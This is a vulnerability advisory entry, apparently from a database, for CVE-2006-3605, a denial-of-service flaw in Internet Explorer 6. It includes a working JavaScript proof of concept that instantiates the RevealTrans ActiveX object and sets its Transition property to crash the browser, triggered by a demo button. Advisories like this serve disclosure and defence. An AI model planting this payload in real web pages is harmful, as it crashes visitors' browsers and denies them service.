Microsoft IE ActiveX Object Transition Property Denial-of-Service Vulnerability

Vulnerability ID: 1110599    Vulnerability type: Other
Published: 2006-07-12    Updated: 2007-06-27
CVE ID: CVE-2006-3605    CNNVD-ID: CNNVD-200607-252
Platform: Windows    CVSS score: 5.0
|Vulnerability Sources
https://www.exploit-db.com/exploits/28213
https://www.securityfocus.com/bid/18960
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200607-252
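|Vulnerability Details
Microsoft Internet Explorer is a very popular web browser released by Microsoft. Internet Explorer has a vulnerability in how it handles certain unexpected ActiveX object operations, which remote attackers may exploit to crash IE. When Internet Explorer handles an assignment to the Transition property of an ActiveX object, a null pointer dereference occurs, causing the browser to crash.
|Vulnerability EXP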
source: http://www.securityfocus.com/bid/18960/info

Microsoft Internet Explorer is prone to a denial-of-service vulnerability.

This issue is triggered when an attacker convinces a victim user to visit a malicious website.

Remote attackers may exploit this issue to crash Internet Explorer, effectively denying service to legitimate users.

<script>
// MoBB Demonstration
function Demo() {
	var a = new ActiveXObject('DXImageTransform.Microsoft.RevealTrans.1');
	a.Transition = 1;
}

</script>

Clicking the button below may crash your browser!<br><br>
<input type='button' onClick='Demo()' value='Start Demo!'>
|Affected Products
Microsoft Internet Explorer 6.0 SP1 Microsoft Internet Explorer 6.0 - Microsoft Windows 2000 Advanced Server SP2 - Microsoft Windows 2000 Advanced Se
|References

Source: XF
Name: ie-revealtrans-dos(27713)
Link: http://xforce.iss.net/xforce/xfdb/27713
Source: BID
Name: 18960
Link: http://www.securityfocus.com/bid/18960
Source: OSVDB
Name: 27057
Link: http://www.osvdb.org/27057
Source: VUPEN
Name: ADV-2006-2793
Link: http://www.frsirt.com/english/advisories/2006/2793
Source: MISC
Link: http://browserfun.blogspot.com/2006/07/mobb-13-revealtrans-transition.html